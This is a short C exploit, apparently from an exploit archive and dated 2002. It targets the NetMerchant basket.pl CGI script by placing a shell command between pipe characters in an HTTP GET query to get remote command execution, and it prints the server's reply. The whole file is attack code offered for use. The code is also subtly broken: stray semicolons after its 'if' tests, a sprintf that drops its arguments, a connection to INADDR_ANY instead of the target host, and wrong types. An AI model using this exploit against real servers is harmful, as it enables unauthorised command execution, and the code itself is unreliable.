Exploit for NetMerchant that allows for remote command execution.
e30fda7b60a08dc3612148a6ccee162a260d3ab4e8710e2ff20fee58a2b5224d
/*
* PROPERTY OF THE ELECTRONICSOULS CREW !
* DO NOT DISTRIBUTE !
*
* (C) BrainStorm [ElectronicSouls]
*
* NetMerchant bug in basket.pl
* you can execute commands but
* 0x20 is filterd!
*
* it isnt widely used, but could
* be usefull sometime so...
* ..KEEP THIS PRIVATE !!$&%
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>
int main(int argc, char **argv[])
{
struct sockaddr_in dope;
struct hostent *host;
char buf[8000];
int sock, rt, len, STR1, STR2;
STR1 = argv[2];
STR2 = argv[3];
if (argv[1] == 0);
{
printf("enter a host \n");
}
if (argv[2] == 0);
{
STR1 = "/cgi-bin/";
}
if (argv[3] == 0);
{
STR2 = "whoami";
}
host = gethostbyname((void *)argv[1]);
sock = socket(AF_INET, SOCK_STREAM, 0);
bzero(&(dope.sin_zero), 8);
dope.sin_family = AF_INET;
dope.sin_addr.s_addr = htonl(INADDR_ANY);
dope.sin_port = htons(80);
rt = connect(sock, (void *)&dope, sizeof(dope));
if (rt == -1)
{
perror("Connect..");
printf("\n");
exit(1);
}
printf("\n\n[ ElectronicSouls ] - NetMerchant basket.pl exploit \n");
printf("(C) BrainStorm - 2002 \n\n");
printf("[!] Connected to %s\n", argv[1]);
memset(&buf, 0, sizeof(buf));
sprintf(buf, "GET ", STR1, "basket.pl/bigheadshop?|", STR2, "|", "HTTP/1.1\n\n", argv[2], argv[3]);
printf("[*] Sending exploit string..\n");
send(sock, buf, sizeof(buf), 0);
while (1)
{
memset(&buf, 0, sizeof(buf));
len = sizeof(buf);
rt = read(sock, &buf, len);
if (rt <= 0)
{
printf("error!\n");
exit(0);
}
printf("%s\n", buf);
perror("Status ");
exit(0);
}
}